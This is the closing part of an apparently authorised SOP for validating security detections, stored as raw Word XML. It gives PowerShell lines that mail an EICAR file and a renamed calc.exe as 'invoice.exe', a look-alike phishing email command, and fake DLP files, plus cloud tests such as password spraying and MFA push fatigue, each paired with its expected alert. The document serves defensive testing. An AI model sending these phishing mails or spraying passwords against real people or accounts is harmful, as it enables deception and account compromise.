        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy-Item C:\Windows\System32\calc.exe "$env:TEMP\invoice.exe"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Send-MailMessage -From 'tester@lab.local' -To '&lt;victim@customer.com&gt;' -Subject 'Invoice' -Body '.' -Attachments "$env:TEMP\eicar.com","$env:TEMP\invoice.exe" -SmtpServer '&lt;SMTP&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Expected detection: Mail security alert for malware or a blocked attachment type.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">12.2  Suspected phishing email (SPLUC0107)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Send a phishing-style email with a look-alike sender, urgent language, and a suspicious link to a monitored mailbox.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Send-MailMessage -From 'security-alert@micros0ft-support.com' -To '&lt;victim@customer.com&gt;' -Subject 'URGENT: account suspended' -Body 'Verify: http://&lt;LAB_PHISH&gt;/login' -SmtpServer '&lt;SMTP&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Expected detection: Mail security or phishing-detection alert.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">12.3  Multiple DLP violations (UC0575)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create files containing fake sensitive data patterns and send them through the monitored channel several times.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">1..5 | ForEach-Object { 'Credit Card: 4111 1111 1111 1111' | Set-Content "$env:TEMP\sensitive_$_.txt" }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Expected detection: DLP alert showing two or more violations for the same user.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">13.  Cloud Procedures (Azure / Microsoft 365)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cloud identity use cases are performed in the browser using an authorised test account. No tooling is installed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shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Use case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4060"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Expected detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2700"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Azure activity CRUD (UC0458)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4060"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Create a resource group, add a tag, then delete it in the Azure portal.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Activity-log alert for the create, update, and delete operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2700"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Explicit MFA deny (UC0215)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4060"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Sign in with the test account and deny the multi-factor prompt.</w:t>
            </w:r>
          </w:p>
        </w:tc>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Sign-in log shows the MFA request was denied.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2700"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Privileged access outside PIM (UC0327)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4060"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Assign a privileged role permanently (not through PIM) and perform an administrative action.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Audit log shows privileged use without a matching PIM activation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2700"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">M365 password spraying</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4060"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Attempt one agreed password across several test accounts at the sign-in portal.</w:t>
            </w:r>
          </w:p>
        </w:tc>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Sign-in logs show many failed logons from one source.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2700"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Malicious MFA takeover</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4060"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Repeatedly trigger push prompts, or register a new MFA method on the test account.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Logs show repeated MFA prompts or a new security-information registration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">14.  Network Device Procedures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">14.1  Privilege change on firewall (UC0110)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This use case is performed on the firewall itself by an authorised administrator. Create or modify an administrator account or change an administrator's role.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create or elevate an administrator account using the device's management interface or CLI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Expected detection: Firewall administration or audit log shows the privilege change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">15.  Recording and Reporting Results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For each test, record the use-case reference, the UTC time, the source host and address, the target, the result (detected, prevented, or gap), and a reference to the supporting evidence. Capture screenshots of any block raised by a control and of the corresponding SIEM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40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Example</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Use case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">UC0036 – APT process creation</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Date / time (UTC)</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2026-10-13 09:14</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Source host / address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">WIN-TEST01 / 10.20.39.11</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Target</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Local host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Prevented (endpoint protection terminated the process)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6760"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Screenshot 12, SIEM search reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A gap (activity ran with no alert) is raised with the customer for remediation and re-tested after the control is tuned.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">16.  Cleanup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Delete all test files created during endpoint, email, and DLP testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remove any registry keys, scheduled tasks, or firewall rules created for a test.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remove any cloud resources created for a test.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confirm the host is returned to its pre-test state before closing the engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">17.  References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Engagement authorisation and scope document.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Customer use-case catalogue and SIEM detection content.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MITRE ATT&amp;CK framework (technique mapping for each use case).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Internal TDA testing runbooks (command-level detail per use case).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TDA Detection Validation SOP  |  Version 1.0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TDA Detection Validation SOP</dc:title>
  <dc:creator>Offensive Security Team</dc:creator>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-13T08:42:11.936Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-13T08:42:11.936Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>